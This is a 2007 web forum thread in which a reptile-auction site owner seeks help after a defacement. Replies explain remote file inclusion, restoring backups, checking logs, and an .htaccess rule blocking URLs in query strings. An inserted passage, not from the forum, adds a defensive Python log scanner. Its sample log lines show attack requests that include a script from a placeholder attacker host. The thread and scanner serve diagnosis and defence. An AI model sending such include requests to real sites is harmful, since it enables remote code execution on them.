Ravens PHP Scripts: Forums
Serafim
Worker
Joined: Mar 25, 2006
Posts: 109
Location: Delaware Usa

Posted: Sun Oct 28, 2007 3:13 pm

Well, I haven't been on here in a while, but I could sure use some help. I run an online auction called herps4sale.com. We are a simple site dedicated to hobbyist reptile keepers. I got this great message on my index page this afternoon:

Hacked By kentunk
Indonesia Hacker Community
#sekuritionline #generation-x @ Dal.net

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 5

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 6

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 7

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 8

Warning: mysql_query(): Access denied for user: 'nobody@localhost' (Using password: NO) in /home/herps4sa/public_html/maintenance.php on line 10

Warning: mysql_query(): A link to the server could not be established in /home/herps4sa/public_html/maintenance.php on line 10
Error: SELECT * FROM PHPAUCTIONXL_statssettings
Access denied for user: 'nobody@localhost' (Using password: NO)

I am not sure what happened; I assume someone accessed my config file and figured out where the password is located. I need to see what I can do to protect these files. I cannot remember what chmod to place on such files. I did not set this site up; I paid to have this done. The person that hosts me has yet to get back with me. I am sure she is aware of the issue, as the index page was corrected. Anyone interested in helping me fix this, please let me know. I am really not sure what would happen if I changed the chmod. I'm not sure if it will break the site. But I know a lot of damage was done and it cost me a lot. Not to mention the embarrassment factor.

evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221

Posted: Sun Oct 28, 2007 6:40 pm

It is possible they changed your config file. If you have a file backup, you'll need to restore clean files. They also may have changed data in your database.

Really it is best you restore from a clean backup. And figure out how they got in and patch it. You will need to go through your access logs to determine how they got in.

If you haven't yet, secure your site with the latest patched files and Nuke Sentinel. Or just switch to RavenNuke :)

Serafim
Posted: Sun Oct 28, 2007 6:55 pm

Thanks evaders, but the site is not a Nuke site; it's PHP-based but a totally separate program. I did find where an odd log entry came in. It was a script called kiddies/safe.txt?

I can't find anything about it and cannot understand where it was installed or how. I have a copy of the script I located: [link]

But again, I do not understand what it means. The attack originated from 200.160.240.34. Any help would be appreciated.
 
Dawg
RavenNuke(tm) Development Team
Joined: Nov 07, 2003
Posts: 910

Posted: Mon Oct 29, 2007 3:36 am

[link]

We have been seeing a lot of these as of late. They are called remote file inclusion attacks (I think). What they do is try to include the code in the txt file so it is run on your site. If the attack originated from 200.160.240.34, then that is the IP where the request came from.

You could ban that IP, but it will not do much good. They can just change the IP. Restoring the site from backup is the best way to get started. Once the restore is done, finding what was hit is the next step, and how to stop it.

Without knowing the site or the setup it is really hard to point you in the right direction. I can tell you that RN (Sentinel, really) stops all of these kinds of attacks. Maybe it is time to do a rebuild based on RN. On my own Nuke sites I bet I see 100 attacks like this a day.

Dawg


Last edited by Dawg on Mon Oct 29, 2007 11:32 am; edited 1 time in total 
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

Posted: Mon Oct 29, 2007 7:27 am

Quote:
the site is not a Nuke site; it's PHP-based but a totally separate program

Nuke Sentinel will not help you then. You really need to get the person who set this up to fix it, and you need him/her to determine how the attack got in and put security in place to keep it from happening again.
evaders99
Posted: Mon Oct 29, 2007 10:10 am

Yes, the safe.txt is the beginning of a remote file inclusion attack. This script doesn't really show us how you were infected. Access logs would be able to show all activity from 200.160.240.34.

Whatever PHP script you are using, you'll need to find the vulnerability and patch it.
 
slackervaara
Worker
Joined: Aug 26, 2007
Posts: 236

Posted: Mon Oct 29, 2007 12:33 pm

Couldn't protection against cross scripting be added through the .htaccess file and mod_rewrite? I have included this in my .htaccess:

RewriteEngine on

# Refuse (403 Forbidden) any request whose query string contains a literal "http://"
RewriteCond %{QUERY_STRING} .*http:\/\/.*
RewriteRule ^.* - [F]
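As an added example (my own code, not anything posted in this thread), here is a small Python scanner that does the two things the replies above ask for: it pulls every request from one source address out of an Apache access log, as evaders99 suggests, and it flags requests whose query string carries a remote URL of the kind used for remote file inclusion, while also reporting what slackervaara's RewriteCond rule would have blocked. The log lines are constructed; "attacker.example" and the parameter names are placeholders, only the source IP and the kiddies/safe.txt name come from the thread.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed Apache combined-format sample, not the thread's real log. The source IP and the
# kiddies/safe.txt name are from the thread; "attacker.example" and the parameter names are
# placeholders. Line 4 is a legitimate request that happens to carry a URL in a parameter.
SAMPLE_LOG = """\
200.160.240.34 - - [28/Oct/2007:14:02:11 -0500] "GET /index.php?page=http://attacker.example/kiddies/safe.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
200.160.240.34 - - [28/Oct/2007:14:02:15 -0500] "GET /index.php?page=https%3A%2F%2Fattacker.example%2Fkiddies%2Fsafe.txt%3F HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
10.0.0.5 - - [28/Oct/2007:14:05:40 -0500] "GET /index.php?page=home HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
10.0.0.9 - - [28/Oct/2007:14:06:02 -0500] "GET /item.php?id=42&ref=http://www.herps4sale.com/ HTTP/1.1" 200 3300 "-" "Mozilla/4.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# An absolute URL inside a decoded parameter value: what a vulnerable include() would fetch.
REMOTE_URL_RE = re.compile(r'(?i)\b(?:https?|ftp)://[^\s&]+')

def htaccess_rule_blocks(raw_query):
    # Emulates the RewriteCond above: a case-sensitive literal match on the raw, still-encoded
    # query string, so https://, ftp:// and %-encoded payloads pass straight through it.
    return "http://" in raw_query

def find_remote_urls(raw_query):
    """Decode each parameter value (again, to catch double encoding) and list absolute URLs."""
    urls = []
    for _, value in parse_qsl(raw_query, keep_blank_values=True):
        urls.extend(REMOTE_URL_RE.findall(unquote(value)))
    return urls

def has_rfi_markers(url):
    # Traits of the payload seen in the thread: a .txt "script" and a trailing "?" (or null
    # byte) that turns whatever the vulnerable include() appends into a harmless query string.
    return url.endswith(("?", "%00", "\x00")) or url.lower().endswith(".txt")

def scan_log(text):
    """One finding per request whose query string carries a remote URL."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, raw_query = m.group("target").partition("?")
        urls = find_remote_urls(raw_query)
        if urls:
            findings.append({"ip": m.group("ip"), "path": path, "urls": urls,
                             "rfi_markers": any(has_rfi_markers(u) for u in urls),
                             "blocked_by_rule": htaccess_rule_blocks(raw_query)})
    return findings

def requests_from(text, ip):
    """Every request line from one source address, the check evaders99 recommends."""
    return [ln for ln in text.splitlines() if ln.startswith(ip + " ")]
```

Run against the sample, the scan shows the limits of the query-string rule: it blocks the plain http:// request but misses the %-encoded https:// one, and it would also refuse the legitimate request on line 4 that merely carries a URL in its ref parameter.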
Serafim
Posted: Mon Oct 29, 2007 2:56 pm

Well, thanks for all the replies. Today is looking much better. All the site is restored, and security has been added at server level. I am told the attack first happened to another site on our server. My site structure is similar in content, so once they knew where to look the rest was history. I am thankful my site did not end up like 12 others that saw far worse damage. I am looking into a better server with more security. The problem here is that my software is very resource intensive, so most hosting providers cannot handle the load or do not want to bog down the server.

Thanks for all the help
 
evaders99
Posted: Mon Oct 29, 2007 6:22 pm

Personally I would recommend a dedicated host. It may be above your budget, but it allows you to handle very database-intensive sites and install your own software for security.

I've been using 1and1's Root Servers: [link]

(I don't think Raven offers this kind of hosting. If so, then please feel free to delete the 1and1 link)
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours